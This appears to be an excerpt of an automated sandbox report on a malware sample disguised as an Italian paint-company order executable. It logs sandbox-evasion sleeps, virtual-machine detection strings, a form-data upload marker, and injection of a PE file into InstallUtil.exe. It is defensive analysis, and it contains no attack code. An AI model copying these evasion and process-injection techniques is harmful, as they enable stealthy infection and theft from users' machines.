Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -98749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -98640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -98528s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -98421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -98310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -98152s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -98031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -97920s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -97812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -97703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -97593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -97484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -97374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -97265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -97156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -97046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -96935s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -96828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -96718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -96609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -96500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -96390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -96281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -96172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -96062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -95953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776	Thread sleep count: 1753 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776	Thread sleep count: 8100 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -599559s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -599233s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -598357s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -598248s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -597132s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -596483s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -596374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -596046s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -595171s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612	Thread sleep time: -594625s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 99856	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 99750	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 99640	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 99531	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 99422	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 99185	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 99078	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 98968	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 98858	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 98749	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 98640	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 98528	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 98421	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 98310	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 98152	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 98031	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 97920	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 97812	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 97703	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 97593	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 97484	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 97374	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 97265	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 97156	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 97046	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 96935	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 96828	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 96718	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 96609	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 96500	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 96390	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 96281	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 96172	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 96062	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 95953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599559	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598357	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598248	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597132	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596483	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2401541375.0000000002E94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: InstallUtil.exe, 00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd36a1470e4a51<
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2401541375.0000000002E94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2400292017.0000000001048000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4587024929.000000000095C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_05F27D90 LdrInitializeThunk,

3_2_05F27D90

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5B0000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5B0000	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5B2000	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5D2000	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5D4000	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 356008	Jump to behavior

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Queries volume information: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
